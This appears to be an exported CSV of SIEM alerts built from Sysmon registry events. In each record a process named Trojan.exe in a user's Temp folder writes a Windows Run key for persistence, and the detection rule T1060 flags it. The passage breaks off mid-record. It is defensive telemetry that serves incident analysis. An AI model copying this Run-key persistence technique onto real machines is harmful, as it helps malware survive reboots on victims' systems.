HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:20.988742500Z"",""eventRecordID"":""1298"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:20.967\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:20.967"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:33.158",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:19.945 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:19.978050900Z"",""eventRecordID"":""1297"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:19.945\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:19.945"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:32.513",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:18.872 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:18.897340100Z"",""eventRecordID"":""1296"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:18.872\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:18.872"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:31.074",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:17.841 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:17.846950700Z"",""eventRecordID"":""1295"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:17.841\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:17.841"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:29.094",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:16.825 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:16.852439300Z"",""eventRecordID"":""1294"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:16.825\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:16.825"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:29.042",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:15.810 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:15.898078100Z"",""eventRecordID"":""1293"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:15.810\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:15.810"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:28.294",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:14.756 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:14.762972900Z"",""eventRecordID"":""1292"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:14.756\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:14.756"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:28.223",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:13.718 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:13.725413300Z"",""eventRecordID"":""1291"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:13.718\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:13.718"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:25.797",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:12.684 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:12.691453400Z"",""eventRecordID"":""1290"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:12.684\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:12.684"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:24.888",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:11.670 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:11.684162400Z"",""eventRecordID"":""1289"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:11.670\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:11.670"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:24.826",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:10.654 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:10.658846000Z"",""eventRecordID"":""1286"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:10.654\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:10.654"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:24.764",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:09.637 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 